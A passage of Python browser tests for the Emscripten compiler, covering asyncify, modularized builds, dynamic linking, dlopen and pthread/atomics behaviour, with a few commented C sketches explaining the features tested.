self.btest('mainloop_reschedule.cpp', '1', args=['-Os', '-s', 'ASYNCIFY'])
def test_mainloop_infloop(self):
self.btest('mainloop_infloop.cpp', '1', args=['-s', 'ASYNCIFY'])
def test_async_iostream(self):
self.btest('browser/async_iostream.cpp', '1', args=['-s', 'ASYNCIFY'])
# Test an async return value. The value goes through a custom JS library
# method that uses asyncify, and therefore it needs to be declared in
# ASYNCIFY_IMPORTS.
# To make the test more precise we also use ASYNCIFY_IGNORE_INDIRECT here.
@parameterized({
'normal': (['-s', 'ASYNCIFY_IMPORTS=[sync_tunnel, sync_tunnel_bool]'],), # noqa
'response': (['-s', 'ASYNCIFY_IMPORTS=@filey.txt'],), # noqa
'nothing': (['-DBAD'],), # noqa
'empty_list': (['-DBAD', '-s', 'ASYNCIFY_IMPORTS=[]'],), # noqa
'em_js_bad': (['-DBAD', '-DUSE_EM_JS'],), # noqa
})
def test_async_returnvalue(self, args):
if '@' in str(args):
create_file('filey.txt', 'sync_tunnel\nsync_tunnel_bool\n')
self.btest('browser/async_returnvalue.cpp', '0', args=['-s', 'ASYNCIFY', '-s', 'ASYNCIFY_IGNORE_INDIRECT', '--js-library', test_file('browser/async_returnvalue.js')] + args + ['-s', 'ASSERTIONS'])
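# Illustrative sketch (not part of the test suite): an async JS import that
# returns a value to C. With a plain --js-library function the import has to be
# listed in ASYNCIFY_IMPORTS, as the test above does; recent Emscripten also
# offers the EM_ASYNC_JS macro, which registers the import automatically
# (fetch_answer below is a made-up name, and the macro's availability is an
# assumption about the toolchain version):
#
#   #include <emscripten.h>
#
#   EM_ASYNC_JS(int, fetch_answer, (), {
#     await new Promise(resolve => setTimeout(resolve, 10));
#     return 42;
#   });
#
#   int main() {
#     return fetch_answer() == 42 ? 0 : 1;
#   }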
def test_async_stack_overflow(self):
self.btest('browser/async_stack_overflow.cpp', 'abort:RuntimeError: unreachable', args=['-s', 'ASYNCIFY', '-s', 'ASYNCIFY_STACK_SIZE=4'])
def test_async_bad_list(self):
self.btest('browser/async_bad_list.cpp', '0', args=['-s', 'ASYNCIFY', '-s', 'ASYNCIFY_ONLY=[waka]', '--profiling'])
# Tests that when building with -s MINIMAL_RUNTIME=1, the build can use -s MODULARIZE=1 as well.
def test_minimal_runtime_modularize(self):
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.html', '-s', 'MODULARIZE', '-s', 'MINIMAL_RUNTIME'])
self.run_browser('test.html', None, '/report_result?0')
@requires_sync_compilation
def test_modularize(self):
for opts in [
[],
['-O1'],
['-O2', '-profiling'],
['-O2'],
['-O2', '--closure=1']
]:
for args, code in [
# defaults
([], '''
let promise = Module();
if (!(promise instanceof Promise)) throw new Error('Return value should be a promise');
'''),
# use EXPORT_NAME
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
if (typeof Module !== "undefined") throw "what?!"; // do not pollute the global scope, we are modularized!
HelloWorld.noInitialRun = true; // erroneous module capture will load this and cause timeout
let promise = HelloWorld();
if (!(promise instanceof Promise)) throw new Error('Return value should be a promise');
'''),
# pass in a Module option (which prevents main(), which we then invoke ourselves)
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
HelloWorld({ noInitialRun: true }).then(hello => {
hello._main();
});
'''),
# Even without a mem init file, everything is async
(['-s', 'EXPORT_NAME="HelloWorld"', '--memory-init-file', '0'], '''
HelloWorld({ noInitialRun: true }).then(hello => {
hello._main();
});
'''),
]:
print('test on', opts, args, code)
# this test is synchronous, so avoid async startup due to wasm features
self.compile_btest([test_file('browser_test_hello_world.c'), '-s', 'MODULARIZE', '-s', 'SINGLE_FILE'] + args + opts)
create_file('a.html', '''
<script src="a.out.js"></script>
<script>
%s
</script>
''' % code)
self.run_browser('a.html', '...', '/report_result?0')
def test_modularize_network_error(self):
test_c_path = test_file('browser_test_hello_world.c')
browser_reporting_js_path = test_file('browser_reporting.js')
self.compile_btest([test_c_path, '-s', 'MODULARIZE', '-s', 'EXPORT_NAME="createModule"', '--extern-pre-js', browser_reporting_js_path], reporting=Reporting.NONE)
create_file('a.html', '''
<script src="a.out.js"></script>
<script>
createModule()
.then(() => {
reportResultToServer("Module creation succeeded when it should have failed");
})
.catch(err => {
reportResultToServer(err.message);
});
</script>
''')
print('Deleting a.out.wasm to cause a download error')
os.remove('a.out.wasm')
self.run_browser('a.html', '...', '/report_result?Aborted(both async and sync fetching of the wasm failed)')
def test_modularize_init_error(self):
test_cpp_path = test_file('browser/test_modularize_init_error.cpp')
browser_reporting_js_path = test_file('browser_reporting.js')
self.compile_btest([test_cpp_path, '-s', 'MODULARIZE', '-s', 'EXPORT_NAME="createModule"', '--extern-pre-js', browser_reporting_js_path], reporting=Reporting.NONE)
create_file('a.html', '''
<script src="a.out.js"></script>
<script>
if (typeof window === 'object') {
window.addEventListener('unhandledrejection', function(event) {
reportResultToServer("Unhandled promise rejection: " + event.reason.message);
});
}
createModule()
.then(() => {
reportResultToServer("Module creation succeeded when it should have failed");
})
.catch(err => {
reportResultToServer(err);
});
</script>
''')
self.run_browser('a.html', '...', '/report_result?intentional error to test rejection')
# test illustrating the regression on the modularize feature since commit c5af8f6
# when compiling with the --preload-file option
def test_modularize_and_preload_files(self):
self.set_setting('EXIT_RUNTIME')
# an amount of memory, different from the default, that will be allocated for the emscripten heap
totalMemory = 33554432
for opts in [[], ['-O1'], ['-O2', '-profiling'], ['-O2'], ['-O2', '--closure=1']]:
# the main function simply checks that the amount of allocated heap memory is correct
create_file('test.c', r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
EM_ASM({
// use bracket access on Module so this also works when closure compiler renames properties
var totalMemory = Module['INITIAL_MEMORY'];
assert(totalMemory === %d, 'bad memory size');
});
return 0;
}
''' % totalMemory)
# generate a dummy file
create_file('dummy_file', 'dummy')
# compile the code with the modularize feature and the preload-file option enabled
# no wasm, since this tests customizing total memory at runtime
self.compile_btest(['test.c', '-s', 'WASM=0', '-s', 'MODULARIZE', '-s', 'EXPORT_NAME="Foo"', '--preload-file', 'dummy_file'] + opts, reporting=Reporting.JS_ONLY)
create_file('a.html', '''
<script src="a.out.js"></script>
<script>
// instantiate the Foo module with custom INITIAL_MEMORY value
var foo = Foo({ INITIAL_MEMORY: %d });
</script>
''' % totalMemory)
self.run_browser('a.html', '...', '/report_result?exit:0')
def test_webidl(self):
# see original in test_core.py
self.run_process([WEBIDL_BINDER, test_file('webidl/test.idl'), 'glue'])
self.assertExists('glue.cpp')
self.assertExists('glue.js')
for opts in [[], ['-O1'], ['-O2']]:
print(opts)
self.btest(Path('webidl/test.cpp'), '1', args=['--post-js', 'glue.js', '-I.', '-DBROWSER'] + opts)
@requires_sync_compilation
def test_dynamic_link(self):
create_file('main.c', r'''
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <emscripten.h>
char *side(const char *data);
int main() {
char *temp = side("hello through side\n");
char *ret = (char*)malloc(strlen(temp)+1);
strcpy(ret, temp);
temp[1] = 'x';
EM_ASM({
Module.realPrint = out;
out = function(x) {
if (!Module.printed) Module.printed = x;
Module.realPrint(x);
};
});
puts(ret);
EM_ASM({ assert(Module.printed === 'hello through side', ['expected', Module.printed]); });
return 0;
}
''')
create_file('side.c', r'''
#include <stdlib.h>
#include <string.h>
char *side(const char *data);
char *side(const char *data) {
char *ret = (char*)malloc(strlen(data)+1);
strcpy(ret, data);
return ret;
}
''')
self.run_process([EMCC, 'side.c', '-s', 'SIDE_MODULE', '-O2', '-o', 'side.wasm'])
self.btest_exit(self.in_dir('main.c'), args=['-s', 'MAIN_MODULE=2', '-O2', 'side.wasm'])
print('wasm in worker (we can read binary data synchronously there)')
self.run_process([EMCC, 'side.c', '-s', 'SIDE_MODULE', '-O2', '-o', 'side.wasm'])
self.btest_exit(self.in_dir('main.c'), args=['-s', 'MAIN_MODULE=2', '-O2', '--proxy-to-worker', 'side.wasm'])
print('wasm (will auto-preload since no sync binary reading)')
# same wasm side module works
self.btest_exit(self.in_dir('main.c'), args=['-s', 'MAIN_MODULE=2', '-O2', '-s', 'EXPORT_ALL', 'side.wasm'])
def test_dlopen_async(self):
create_file('side.c', 'int foo = 42;\n')
self.run_process([EMCC, 'side.c', '-o', 'libside.so', '-s', 'SIDE_MODULE'])
self.btest_exit(test_file('other/test_dlopen_async.c'), args=['-s', 'MAIN_MODULE=2'])
def test_dlopen_blocking(self):
create_file('side.c', 'int foo = 42;\n')
self.run_process([EMCC, 'side.c', '-o', 'libside.so', '-s', 'SIDE_MODULE', '-s', 'USE_PTHREADS', '-Wno-experimental'])
# Attempting to dlopen the side module (without preloading) should fail on the main thread
# since the synchronous `readBinary` function does not exist.
self.btest_exit(test_file('other/test_dlopen_blocking.c'), assert_returncode=1, args=['-s', 'MAIN_MODULE=2'])
# But with PROXY_TO_PTHREAD it does work, since we can do blocking and sync XHR in a worker.
self.btest_exit(test_file('other/test_dlopen_blocking.c'), args=['-s', 'MAIN_MODULE=2', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS', '-Wno-experimental'])
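# Illustrative sketch (not part of the test suite): the dlopen() path these
# tests exercise is the usual <dlfcn.h> sequence. On the browser's main thread
# it can only succeed if the .so was preloaded, while under PROXY_TO_PTHREAD the
# worker may block and fetch it synchronously:
#
#   #include <dlfcn.h>
#
#   int read_foo(void) {
#     void *lib = dlopen("libside.so", RTLD_NOW);
#     if (!lib) return -1;
#     int *foo = (int*)dlsym(lib, "foo");
#     return foo ? *foo : -1;
#   }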
# verify that dynamic linking works in all kinds of in-browser environments.
# don't mix different kinds in a single test.
@parameterized({
'': ([0],),
'inworker': ([1],),
})
def test_dylink_dso_needed(self, inworker):
self.emcc_args += ['-O2']
# --proxy-to-worker only on main
if inworker:
self.emcc_args += ['--proxy-to-worker']
def do_run(src, expected_output, emcc_args=[]):
# XXX there is no infrastructure (yet ?) to retrieve stdout from browser in tests.
# -> do the assert about expected output inside browser.
#
# we have to put the hook into post.js because in main it is too late
# (in main we won't be able to catch what static constructors inside
# linked dynlibs printed), and in pre.js it is too early (out is not yet
# set up by the shell).
create_file('post.js', r'''
Module.realPrint = out;
out = function(x) {
if (!Module.printed) Module.printed = "";
Module.printed += x + '\n'; // out is passed str without last \n
Module.realPrint(x);
};
''')
create_file('test_dylink_dso_needed.c', src + r'''
#include <emscripten/em_asm.h>
int main() {
int rtn = test_main();
EM_ASM({
var expected = %r;
assert(Module.printed === expected, ['stdout expected:', expected]);
});
return rtn;
}
''' % expected_output)
self.btest_exit(self.in_dir('test_dylink_dso_needed.c'), args=self.get_emcc_args() + ['--post-js', 'post.js'] + emcc_args)
self._test_dylink_dso_needed(do_run)
@requires_graphics_hardware
@requires_sync_compilation
def test_dynamic_link_glemu(self):
create_file('main.c', r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
const char *side();
int main() {
const char *exts = side();
puts(side());
assert(strstr(exts, "GL_EXT_texture_env_combine"));
return 0;
}
''')
create_file('side.c', r'''
#include "SDL/SDL.h"
#include "SDL/SDL_opengl.h"
const char *side() {
SDL_Init(SDL_INIT_VIDEO);
SDL_SetVideoMode(600, 600, 16, SDL_OPENGL);
return (const char *)glGetString(GL_EXTENSIONS);
}
''')
self.run_process([EMCC, 'side.c', '-s', 'SIDE_MODULE', '-O2', '-o', 'side.wasm', '-lSDL'])
self.btest_exit(self.in_dir('main.c'), args=['-s', 'MAIN_MODULE=2', '-O2', '-s', 'LEGACY_GL_EMULATION', '-lSDL', '-lGL', 'side.wasm'])
def test_dynamic_link_many(self):
# test asynchronously loading two side modules during startup
create_file('main.c', r'''
#include <assert.h>
int side1();
int side2();
int main() {
assert(side1() == 1);
assert(side2() == 2);
return 0;
}
''')
create_file('side1.c', r'''
int side1() { return 1; }
''')
create_file('side2.c', r'''
int side2() { return 2; }
''')
self.run_process([EMCC, 'side1.c', '-s', 'SIDE_MODULE', '-o', 'side1.wasm'])
self.run_process([EMCC, 'side2.c', '-s', 'SIDE_MODULE', '-o', 'side2.wasm'])
self.btest_exit(self.in_dir('main.c'), args=['-s', 'MAIN_MODULE=2', 'side1.wasm', 'side2.wasm'])
def test_dynamic_link_pthread_many(self):
# Test asynchronously loading two side modules during startup
# They should always load in the same order
# Verify that function pointers in the browser's main thread
# refer to the same function as in a pthread worker.
# The main thread function table is populated asynchronously
# in the browser's main thread. However, it should still be
# populated in the same order as in a pthread worker to
# guarantee function pointer interop.
create_file('main.cpp', r'''
#include <cassert>
#include <thread>
#include <emscripten/emscripten.h>
int side1();
int side2();
int main() {
auto side1_ptr = &side1;
auto side2_ptr = &side2;
// Don't join the thread since this is running in the
// browser's main thread.
std::thread([=]{
assert(side1_ptr == &side1);
assert(side2_ptr == &side2);
emscripten_force_exit(0);
}).detach();
emscripten_exit_with_live_runtime();
}
''')
# The browser will try to load side1 first.
# Use a big payload in side1 so that it takes longer to load than side2
create_file('side1.cpp', r'''
char const * payload1 = "''' + str(list(range(1, int(1e5)))) + r'''";
int side1() { return 1; }
''')
create_file('side2.cpp', r'''
char const * payload2 = "0";
int side2() { return 2; }
''')
self.run_process([EMCC, 'side1.cpp', '-Wno-experimental', '-pthread', '-s', 'SIDE_MODULE', '-o', 'side1.wasm'])
self.run_process([EMCC, 'side2.cpp', '-Wno-experimental', '-pthread', '-s', 'SIDE_MODULE', '-o', 'side2.wasm'])
self.btest_exit(self.in_dir('main.cpp'),
args=['-Wno-experimental', '-pthread', '-s', 'MAIN_MODULE=2', 'side1.wasm', 'side2.wasm'])
def test_memory_growth_during_startup(self):
create_file('data.dat', 'X' * (30 * 1024 * 1024))
self.btest('browser_test_hello_world.c', '0', args=['-s', 'ASSERTIONS', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'INITIAL_MEMORY=16MB', '-s', 'TOTAL_STACK=16384', '--preload-file', 'data.dat'])
# pthreads tests
def prep_no_SAB(self):
create_file('html.html', read_file(path_from_root('src/shell_minimal.html')).replace('''<body>''', '''<body>
<script>
SharedArrayBuffer = undefined;
Atomics = undefined;
</script>
'''))
@requires_threads
def test_pthread_c11_threads(self):
self.btest_exit(test_file('pthread/test_pthread_c11_threads.c'),
args=['-gsource-map', '-std=gnu11', '-xc', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'TOTAL_MEMORY=64mb'])
@requires_threads
def test_pthread_pool_size_strict(self):
# Check that it doesn't fail with sufficient number of threads in the pool.
self.btest_exit(test_file('pthread/test_pthread_c11_threads.c'),
args=['-g2', '-xc', '-std=gnu11', '-pthread', '-s', 'PTHREAD_POOL_SIZE=4', '-s', 'PTHREAD_POOL_SIZE_STRICT=2', '-s', 'TOTAL_MEMORY=64mb'])
# Check that it fails instead of deadlocking on insufficient number of threads in the pool.
self.btest(test_file('pthread/test_pthread_c11_threads.c'),
expected='abort:Assertion failed: thrd_create(&t4, thread_main, NULL) == thrd_success',
args=['-g2', '-xc', '-std=gnu11', '-pthread', '-s', 'PTHREAD_POOL_SIZE=3', '-s', 'PTHREAD_POOL_SIZE_STRICT=2', '-s', 'TOTAL_MEMORY=64mb'])
@requires_threads
def test_pthread_in_pthread_pool_size_strict(self):
# Check that it fails when there's a pthread creating another pthread.
self.btest_exit(test_file('pthread/test_pthread_create_pthread.cpp'), args=['-g2', '-pthread', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'PTHREAD_POOL_SIZE_STRICT=2'])
# Check that it fails when there's a pthread creating another pthread.
self.btest_exit(test_file('pthread/test_pthread_create_pthread.cpp'), args=['-g2', '-pthread', '-s', 'PTHREAD_POOL_SIZE=1', '-s', 'PTHREAD_POOL_SIZE_STRICT=2', '-DSMALL_POOL'])
# Test that the emscripten_ atomics api functions work.
@parameterized({
'normal': ([],),
'closure': (['--closure=1'],),
})
@requires_threads
def test_pthread_atomics(self, args=[]):
self.btest_exit(test_file('pthread/test_pthread_atomics.cpp'), args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8', '-g1'] + args)
# Test 64-bit atomics.
@requires_threads
def test_pthread_64bit_atomics(self):
self.btest_exit(test_file('pthread/test_pthread_64bit_atomics.cpp'), args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test 64-bit C++11 atomics.
@parameterized({
'': ([],),
'O3': (['-O3'],)
})
@requires_threads
def test_pthread_64bit_cxx11_atomics(self, opt):
for pthreads in [[], ['-s', 'USE_PTHREADS']]:
self.btest_exit(test_file('pthread/test_pthread_64bit_cxx11_atomics.cpp'), args=opt + pthreads)
# Test c++ std::thread::hardware_concurrency()
@requires_threads
def test_pthread_hardware_concurrency(self):
self.btest_exit(test_file('pthread/test_pthread_hardware_concurrency.cpp'), args=['-O2', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE="navigator.hardwareConcurrency"'])
@parameterized({
'join': ('join',),
'wait': ('wait',),
})
@requires_threads
def test_pthread_main_thread_blocking(self, name):
print('Test that we error if not ALLOW_BLOCKING_ON_MAIN_THREAD')
self.btest(test_file('pthread/main_thread_%s.cpp' % name), expected='abort:Blocking on the main thread is not allowed by default.', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
if name == 'join':
print('Test that by default we just warn about blocking on the main thread.')
self.btest_exit(test_file('pthread/main_thread_%s.cpp' % name), args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
print('Test that tryjoin is fine, even if not ALLOW_BLOCKING_ON_MAIN_THREAD')
self.btest_exit(test_file('pthread/main_thread_join.cpp'), assert_returncode=2, args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-g', '-DTRY_JOIN', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
print('Test that tryjoin is fine, even if not ALLOW_BLOCKING_ON_MAIN_THREAD, and even without a pool')
self.btest_exit(test_file('pthread/main_thread_join.cpp'), assert_returncode=2, args=['-O3', '-s', 'USE_PTHREADS', '-g', '-DTRY_JOIN', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
print('Test that everything works ok when we are on a pthread.')
self.btest_exit(test_file('pthread/main_thread_%s.cpp' % name), args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-s', 'PROXY_TO_PTHREAD', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
# Test the old GCC atomic __sync_fetch_and_op builtin operations.
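# A minimal sketch of the legacy GCC __sync_fetch_and_<op> pattern being tested (illustration
# only; the real test source lives in pthread/test_pthread_gcc_atomic_fetch_and_op.cpp):
#
#   #include <stdint.h>
#
#   volatile uint32_t shared = 0;
#
#   void bump(void) {
#     // Returns the value held *before* the addition, like the other __sync_fetch_and_* builtins.
#     uint32_t old = __sync_fetch_and_add(&shared, 1);
#     (void)old;
#   }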
@requires_threads
def test_pthread_gcc_atomic_fetch_and_op(self):
self.emcc_args += ['-Wno-sync-fetch-and-nand-semantics-changed']
for opt in [[], ['-O1'], ['-O2'], ['-O3'], ['-Os']]:
for debug in [[], ['-g']]:
args = opt + debug
print(args)
self.btest_exit(test_file('pthread/test_pthread_gcc_atomic_fetch_and_op.cpp'), args=args + ['-s', 'INITIAL_MEMORY=64MB', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# 64 bit version of the above test.
@also_with_wasm2js
@requires_threads
def test_pthread_gcc_64bit_atomic_fetch_and_op(self):
if not self.is_wasm():
self.skipTest('https://github.com/WebAssembly/binaryen/issues/4358')
self.emcc_args += ['-Wno-sync-fetch-and-nand-semantics-changed']
self.btest_exit(test_file('pthread/test_pthread_gcc_64bit_atomic_fetch_and_op.cpp'), args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test the old GCC atomic __sync_op_and_fetch builtin operations.
@also_with_wasm2js
@requires_threads
def test_pthread_gcc_atomic_op_and_fetch(self):
self.emcc_args += ['-Wno-sync-fetch-and-nand-semantics-changed']
self.btest_exit(test_file('pthread/test_pthread_gcc_atomic_op_and_fetch.cpp'), args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# 64 bit version of the above test.
@also_with_wasm2js
@requires_threads
def test_pthread_gcc_64bit_atomic_op_and_fetch(self):
if not self.is_wasm():
self.skipTest('https://github.com/WebAssembly/binaryen/issues/4358')
self.emcc_args += ['-Wno-sync-fetch-and-nand-semantics-changed', '--profiling-funcs']
self.btest_exit(test_file('pthread/test_pthread_gcc_64bit_atomic_op_and_fetch.cpp'), args=['-s', 'INITIAL_MEMORY=64MB', '-s', 'USE_PTHREADS', '-O2', '-s', 'PTHREAD_POOL_SIZE=8'])
# Tests the rest of the remaining GCC atomics after the two above tests.
@also_with_wasm2js
@requires_threads
def test_pthread_gcc_atomics(self):
self.btest_exit(test_file('pthread/test_pthread_gcc_atomics.cpp'), args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test the __sync_lock_test_and_set and __sync_lock_release primitives.
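# Sketch of the spinlock pattern built on these primitives (illustration only, assuming the
# standard GCC builtin semantics):
#
#   volatile int lock = 0;
#
#   void acquire(void) {
#     // __sync_lock_test_and_set returns the previous value; spin until we flip 0 -> 1.
#     while (__sync_lock_test_and_set(&lock, 1)) { /* spin */ }
#   }
#
#   void release(void) {
#     __sync_lock_release(&lock);  // write 0 with release semantics
#   }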
@also_with_wasm2js
@requires_threads
def test_pthread_gcc_spinlock(self):
for arg in [[], ['-DUSE_EMSCRIPTEN_INTRINSICS']]:
self.btest_exit(test_file('pthread/test_pthread_gcc_spinlock.cpp'), args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'] + arg)
# Test that basic thread creation works.
@requires_threads
def test_pthread_create(self):
def test(args):
print(args)
self.btest_exit(test_file('pthread/test_pthread_create.cpp'),
args=['-s', 'INITIAL_MEMORY=64MB', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'] + args,
extra_tries=0) # this should be 100% deterministic
print() # new line
test([])
test(['-O3'])
# TODO: re-enable minimal runtime once the flakiness is figured out,
# https://github.com/emscripten-core/emscripten/issues/12368
# test(['-s', 'MINIMAL_RUNTIME'])
# Test that preallocating worker threads works.
@requires_threads
def test_pthread_preallocates_workers(self):
self.btest_exit(test_file('pthread/test_pthread_preallocates_workers.cpp'), args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=4', '-s', 'PTHREAD_POOL_DELAY_LOAD'])
# Test that allocating a lot of threads doesn't regress. This needs to be checked manually!
@requires_threads
def test_pthread_large_pthread_allocation(self):
self.btest_exit(test_file('pthread/test_large_pthread_allocation.cpp'), args=['-s', 'INITIAL_MEMORY=128MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=50'], message='Check output from test to ensure that a regression in time it takes to allocate the threads has not occurred.')
# Tests the -s PROXY_TO_PTHREAD=1 option.
@requires_threads
def test_pthread_proxy_to_pthread(self):
self.btest_exit(test_file('pthread/test_pthread_proxy_to_pthread.c'), args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
# Test that a pthread can spawn another pthread of its own.
@requires_threads
def test_pthread_create_pthread(self):
for modularize in [[], ['-s', 'MODULARIZE', '-s', 'EXPORT_NAME=MyModule', '--shell-file', test_file('shell_that_launches_modularize.html')]]:
self.btest_exit(test_file('pthread/test_pthread_create_pthread.cpp'), args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2'] + modularize)
# Test another case of pthreads spawning pthreads, but this time the callers immediately join on the threads they created.
@requires_threads
def test_pthread_nested_spawns(self):
self.btest_exit(test_file('pthread/test_pthread_nested_spawns.cpp'), args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2'])
# Test that main thread can wait for a pthread to finish via pthread_join().
@requires_threads
def test_pthread_join(self):
self.btest_exit(test_file('pthread/test_pthread_join.cpp'), args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that threads can rejoin the pool once detached and finished
@requires_threads
def test_std_thread_detach(self):
self.btest_exit(test_file('pthread/test_std_thread_detach.cpp'), args=['-s', 'USE_PTHREADS'])
# Test pthread_cancel() operation
@requires_threads
def test_pthread_cancel(self):
self.btest_exit(test_file('pthread/test_pthread_cancel.cpp'), args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that pthread_cancel() cancels pthread_cond_wait() operation
@requires_threads
def test_pthread_cancel_cond_wait(self):
self.btest_exit(test_file('pthread/test_pthread_cancel_cond_wait.cpp'), assert_returncode=1, args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test pthread_kill() operation
@no_chrome('pthread_kill hangs chrome renderer, and keep subsequent tests from passing')
@requires_threads
def test_pthread_kill(self):
self.btest_exit(test_file('pthread/test_pthread_kill.cpp'), args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that pthread cleanup stack (pthread_cleanup_push/_pop) works.
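# Sketch of the cleanup-handler pattern this covers (illustration only; the function names here
# are hypothetical):
#
#   #include <pthread.h>
#   #include <stdlib.h>
#
#   static void release_buffer(void *p) { free(p); }
#
#   void *worker(void *arg) {
#     void *buf = malloc(64);
#     pthread_cleanup_push(release_buffer, buf);  // runs on cancellation/pthread_exit, or on pop(1)
#     /* ... work that might be cancelled ... */
#     pthread_cleanup_pop(1);                     // pop and execute the handler
#     return 0;
#   }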
@requires_threads
def test_pthread_cleanup(self):
self.btest_exit(test_file('pthread/test_pthread_cleanup.cpp'), args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Tests the pthread mutex api.
@requires_threads
def test_pthread_mutex(self):
for arg in [[], ['-DSPINLOCK_TEST']]:
self.btest_exit(test_file('pthread/test_pthread_mutex.cpp'), args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'] + arg)
@requires_threads
def test_pthread_attr_getstack(self):
self.btest_exit(test_file('pthread/test_pthread_attr_getstack.c'), args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2'])
# Test that memory allocation is thread-safe.
@requires_threads
def test_pthread_malloc(self):
self.btest_exit(test_file('pthread/test_pthread_malloc.cpp'), args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Stress test pthreads allocating memory that will call into sbrk(), while the main thread has to free up the data.
@requires_threads
def test_pthread_malloc_free(self):
self.btest_exit(test_file('pthread/test_pthread_malloc_free.cpp'), args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'INITIAL_MEMORY=256MB'])
# Test that the pthread_barrier API works ok.
@requires_threads
def test_pthread_barrier(self):
self.btest_exit(test_file('pthread/test_pthread_barrier.cpp'), args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test the pthread_once() function.
@requires_threads
def test_pthread_once(self):
self.btest_exit(test_file('pthread/test_pthread_once.cpp'), args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test against a certain thread exit time handling bug by spawning tons of threads.
@requires_threads
def test_pthread_spawns(self):
self.btest_exit(test_file('pthread/test_pthread_spawns.cpp'), args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8', '--closure=1', '-s', 'ENVIRONMENT=web,worker'])
# It is common for code to flip volatile global vars for thread control. This is a bit lax, but nevertheless, test whether that
# kind of scheme will work with Emscripten as well.
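# Sketch of the (lax) volatile-flag scheme in question; C11 atomics would be the portable way to
# do this, but the test deliberately exercises the plain-volatile pattern (illustration only):
#
#   volatile int should_quit = 0;  // flipped by another thread to request shutdown
#
#   void *worker(void *arg) {
#     while (!should_quit) {
#       /* ... do a slice of work ... */
#     }
#     return 0;
#   }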
@requires_threads
def test_pthread_volatile(self):
for arg in [[], ['-DUSE_C_VOLATILE']]:
self.btest_exit(test_file('pthread/test_pthread_volatile.cpp'), args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'] + arg)
# Test thread-specific data (TLS).
@requires_threads
def test_pthread_thread_local_storage(self):
self.btest_exit(test_file('pthread/test_pthread_thread_local_storage.cpp'), args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'ASSERTIONS'])
# Test the pthread condition variable creation and waiting.
@requires_threads
def test_pthread_condition_variable(self):
self.btest_exit(test_file('pthread/test_pthread_condition_variable.cpp'), args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that pthreads are able to do printf.
@requires_threads
def test_pthread_printf(self):
def run(debug):
